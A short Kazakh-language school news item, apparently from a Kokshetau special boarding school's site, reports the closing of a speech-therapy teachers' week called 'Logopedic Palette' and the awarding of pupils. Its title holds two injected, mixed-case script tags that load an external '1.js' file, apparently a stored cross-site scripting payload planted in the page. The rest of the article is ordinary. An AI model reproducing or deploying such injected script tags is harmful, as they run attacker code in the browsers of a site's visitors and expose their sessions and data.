Логопед апталығының жабылуы.<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>
15.03.2024
Ақмола облысы білім басқармасының “Көкшетау қаласы, №4 арнайы мектеп - интернаты” КММ-де логопед-мұғалімдерінің әдістемелік бірлестігінің “Логопедиялық палитра” тақырыбында апталығының жабылуы өтті. Логопед-мұғалімдердің әдістемелік бірлестігінің апталығы жалпымектептік жоспар шеңберінде білім беру-тәрбие жұмысының жүйесіне кіреді және жалпымектептік қызметті ұйымдастыру кезіндегі жұмыс нысандарының бірі болып табылады. Мұғалімдер алдына қойған мақсаттары: оқушылардың логопедиялық сабақтарға деген қызығушылығын ояту, оқушылардың дұрыс сөйлеуін қалыптастыру.
Апталықтың жабылуында педагогтар қорытынды жасап, белсенді қатысқан оқушыларды грамоталармен марапаттады. Логопед - мұғалімдер апталығы қызықты, танымды өтті.
Просмотров: 584